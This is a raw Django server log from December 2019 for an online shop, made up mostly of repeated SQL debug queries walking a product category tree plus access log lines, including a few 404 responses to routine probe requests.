(0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-28 17:46:57,353 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-28 17:46:57,355 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-28 17:46:57,357 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-28 17:46:57,359 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-28 17:46:57,363 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-28 17:46:57,365 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-28 17:46:57,367 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-28 17:46:57,369 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-28 17:46:57,371 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-28 17:46:57,374 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-28 17:46:57,376 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-28 17:46:57,378 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-28 17:46:57,381 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-28 17:46:57,385 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-28 17:46:57,387 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [28/Dec/2019 17:46:57] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [28/Dec/2019 17:48:43] "GET / HTTP/1.0" 302 0 [28/Dec/2019 17:53:46] "GET / HTTP/1.0" 302 0 [28/Dec/2019 17:58:48] "GET / HTTP/1.0" 302 0 [28/Dec/2019 18:05:03] "GET / HTTP/1.0" 302 0 [28/Dec/2019 18:10:05] "GET / HTTP/1.0" 302 0 [28/Dec/2019 18:15:08] "GET / HTTP/1.0" 302 0 [28/Dec/2019 18:24:53] "GET / HTTP/1.0" 302 0 [28/Dec/2019 18:29:56] "GET / HTTP/1.0" 302 0 [28/Dec/2019 18:34:58] "GET / HTTP/1.0" 302 0 [28/Dec/2019 18:40:01] "GET / HTTP/1.0" 302 0 [28/Dec/2019 18:46:37] "GET / HTTP/1.0" 302 0 [28/Dec/2019 18:54:26] "GET / HTTP/1.0" 302 0 [28/Dec/2019 18:59:28] "GET / HTTP/1.0" 302 0 [28/Dec/2019 19:05:03] "GET / HTTP/1.0" 302 0 [28/Dec/2019 19:10:06] "GET / HTTP/1.0" 302 0 [28/Dec/2019 19:15:08] "GET / HTTP/1.0" 302 0 [28/Dec/2019 19:17:41] "GET / HTTP/1.0" 302 0 [28/Dec/2019 19:19:18] "GET / HTTP/1.0" 302 0 [28/Dec/2019 19:20:11] "GET / HTTP/1.0" 302 0 [28/Dec/2019 19:27:29] "GET / HTTP/1.0" 302 0 [28/Dec/2019 19:36:55] "GET / HTTP/1.0" 302 0 [28/Dec/2019 19:40:01] "GET /whm-server-status HTTP/1.0" 301 0 [28/Dec/2019 19:41:57] "GET / HTTP/1.0" 302 0 [28/Dec/2019 19:47:57] "GET / HTTP/1.0" 302 0 [28/Dec/2019 19:56:31] "GET / HTTP/1.0" 302 0 [28/Dec/2019 20:03:06] "GET / HTTP/1.0" 302 0 [28/Dec/2019 20:10:04] "GET / HTTP/1.0" 302 0 [28/Dec/2019 20:15:07] "GET / HTTP/1.0" 302 0 [28/Dec/2019 20:20:10] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [28/Dec/2019 20:26:46] "GET /proxy.php HTTP/1.0" 404 6342 Not Found: /proxy.php [28/Dec/2019 20:27:29] "GET /proxy.php HTTP/1.0" 404 6342 Not Found: /robots.txt [28/Dec/2019 20:28:33] "GET /robots.txt HTTP/1.0" 404 6341 Not Found: /User/User_Favorite.asp [28/Dec/2019 20:28:35] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=211 HTTP/1.0" 404 6422 Not Found: /xyzx/SendMail.asp [28/Dec/2019 20:28:37] "GET /xyzx/SendMail.asp?ArticleID=328 HTTP/1.0" 404 6376 [28/Dec/2019 20:29:40] "GET / HTTP/1.0" 302 0 [28/Dec/2019 20:34:43] "GET / HTTP/1.0" 302 0 [28/Dec/2019 20:39:46] "GET / HTTP/1.0" 302 0 [28/Dec/2019 20:44:49] "GET / HTTP/1.0" 302 0 [28/Dec/2019 20:48:57] "GET / HTTP/1.0" 302 0 [28/Dec/2019 20:49:55] "GET / HTTP/1.0" 302 0 [28/Dec/2019 20:55:51] "GET / HTTP/1.0" 302 0 [28/Dec/2019 21:05:03] "GET / HTTP/1.0" 302 0 [28/Dec/2019 21:10:38] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [28/Dec/2019 21:11:20] "GET /proxy.php HTTP/1.0" 404 6346 [28/Dec/2019 21:15:41] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-28 21:18:07,151 utils 2749 140297233225472 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-28 21:18:07,162 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-28 21:18:07,169 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-28 21:18:07,173 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-28 21:18:07,178 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-28 21:18:07,182 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-28 21:18:07,186 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-28 21:18:07,190 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-28 21:18:07,194 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-28 21:18:07,199 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-28 21:18:07,203 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-28 21:18:07,207 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-28 21:18:07,211 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-28 21:18:07,215 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-28 21:18:07,221 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-28 21:18:07,225 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-28 21:18:07,228 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-28 21:18:07,232 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-28 21:18:07,236 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-28 21:18:07,242 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-28 21:18:07,246 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-28 21:18:07,250 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-28 21:18:07,254 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-28 21:18:07,258 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-28 21:18:07,262 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-28 21:18:07,268 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-28 21:18:07,272 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-28 21:18:07,276 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-28 21:18:07,280 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-28 21:18:07,284 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-28 21:18:07,290 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-28 21:18:07,294 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-28 21:18:07,299 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-28 21:18:07,303 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-28 21:18:07,307 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-28 21:18:07,314 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-28 21:18:07,318 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-28 21:18:07,322 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-28 21:18:07,326 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-28 21:18:07,330 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-28 21:18:07,334 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-28 21:18:07,339 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-28 21:18:07,343 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-28 21:18:07,347 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; 